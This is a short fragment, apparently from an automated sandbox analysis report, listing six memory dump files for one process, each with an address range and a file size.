                                                                                                                                                                                                                        • memory/5776-992-0x00007FFA540A0000-0x00007FFA540B9000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          100KB

                                                                                                                                                                                                                        • memory/5776-993-0x00007FFA53FB0000-0x00007FFA53FD3000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          140KB

                                                                                                                                                                                                                        • memory/5776-988-0x00007FFA540C0000-0x00007FFA540ED000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          180KB

                                                                                                                                                                                                                        • memory/5776-976-0x00007FFA58850000-0x00007FFA5885F000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          60KB

                                                                                                                                                                                                                        • memory/5776-974-0x00007FFA42840000-0x00007FFA42863000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          140KB

                                                                                                                                                                                                                        • memory/5776-971-0x00007FFA3D6A0000-0x00007FFA3DC8A000-memory.dmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5.9MB